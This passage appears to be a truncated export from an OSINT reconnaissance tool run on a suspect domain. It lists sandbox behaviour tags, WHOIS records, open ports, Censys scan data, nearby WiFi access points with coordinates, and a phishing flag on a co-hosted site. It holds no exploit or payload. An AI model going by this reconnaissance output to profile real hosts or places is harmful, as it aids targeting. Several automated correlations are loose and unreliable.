Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.14325218193887401859"\n "msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.5569041425166893211"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\shopping.js]- [targetUID: 00000000-00002332]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007076]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir2332_1139505351\\Ruleset Data]- [targetUID: 00000000-00002332]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00002332]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00002332]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2332_751382652\\Filtering Rules]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2332_1705320843\\edge_driver.js]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\edge_driver.js]- [targetUID: 00000000-00002332]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\2332_1705320843\\vendor.bundle.js]- [targetUID: 00 |
| 2023-05-12 03:01:12 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.126): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | zhihu (Category: social)
https://www.zhihu.com/people/ayhu | ayhu |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.24): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.168): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:8080 | 104.21.71.14 |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | ebrahemsamir.github.io |
| 2023-05-12 03:00:15 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | webmail.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 43260 | 87.248.157.0/24 |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@name.com | Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
|
| 2023-05-12 03:18:41 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.133:80 | 185.199.109.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Dash-4302 (Net ID: 00:0A:F5:48:32:08) | 32.8608, -79.9746 |
| 2023-05-12 03:11:07 | Physical Coordinates | No | OpenStreetMap | 91 | 0 | 4 | 0 | None | 37.780462,-122.390564 | 101 Townsend Street, San Francisco, US-CA, US, 94107 |
| 2023-05-12 02:53:49 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["926E:68C5:23DED94:340F30D:645D2C8B"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100050-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683827851.292615,VS0,VE22"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["7edd7f29f5c97925d836dfcf6284b65fe4dca468"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8000::153 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | netlify.app | frabjous-lebkuchen-324004.netlify.app |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | pannet-24 (Net ID: 00:01:8E:DA:59:C4) | 37.7642, -122.3993 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.110.153 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.115): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F2:16:28) | 34.0544, -118.244 |
| 2023-05-12 02:44:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:17:33 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-28T04:15:13.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registry Expiry Date: 2023-06-23T23:59:59.0Z
Registrar: Dynadot LLC
Registrar IANA ID: 472
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: California
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: 170.NS1.ABOVE.COM
Name Server: 170.NS2.ABOVE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:33.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-23T05:10:07.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registrar Registration Expiration Date: 2023-06-23T23:59:59.0Z
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
Registry Registrant ID: CPF-291635
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Dynadot Privacy Service
Registrant Street: PO Box 701
Registrant Street:
Registrant City: San Mateo
Registrant State/Province: California
Registrant Postal Code: 94401
Registrant Country: US
Registrant Phone: +1.6505854708
Registrant Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Admin ID: CPF-291635
Admin Name: REDACTED FOR PRIVACY
Admin Organization: Dynadot Privacy Service
Admin Street: PO Box 701
Admin Street:
Admin City: San Mateo
Admin State/Province: California
Admin Postal Code: 94401
Admin Country: US
Admin Phone: +1.6505854708
Admin Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Tech ID: CPF-291635
Tech Name: REDACTED FOR PRIVACY
Tech Organization: Dynadot Privacy Service
Tech Street: PO Box 701
Tech Street:
Tech City: San Mateo
Tech State/Province: California
Tech Postal Code: 94401
Tech Country: US
Tech Phone: +1.6505854708
Tech Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Name Server: 170.ns1.above.com
Name Server: 170.ns2.above.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2022-06-22 22:10:07 -0700 <<<
| ayiu.xyz |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [ebrahemsamir.github.io]
https://www.openphish.com/feed.txt | ebrahemsamir.github.io |
| 2023-05-12 03:12:54 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14806242599 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 104.196.30.220 |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": 